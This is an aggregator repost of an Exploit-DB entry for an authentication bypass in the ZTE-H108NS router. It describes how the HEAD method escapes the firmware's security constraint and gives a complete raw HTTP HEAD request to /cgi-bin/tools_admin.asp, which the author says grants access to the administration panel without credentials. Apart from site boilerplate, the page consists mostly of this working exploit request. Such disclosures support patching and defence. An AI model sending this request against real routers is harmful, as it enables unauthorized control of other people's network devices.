5
[remote] Router ZTE-H108NS - Authentication Bypass
source link: https://www.exploit-db.com/exploits/51138
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Router ZTE-H108NS - Authentication Bypass
EDB-ID:
51138
EDB Verified:
# Exploit Title: Router ZTE-H108NS - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# CVE: N/A
# Tested on: Debian 5.18.5
Description :
When specific http methods are listed within a security constraint,
then only those
methods are protected. Router ZTE-H108NS defines the following http
methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed
operation which allows the HEAD to be implemented correctly with every
Response Status Code.
Proof Of Concept :
Below request bypasses successfully the Basic Authentication, and
grants access to the Administration Panel of the Router.
HEAD /cgi-bin/tools_admin.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSIONID=1cd6bb77
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK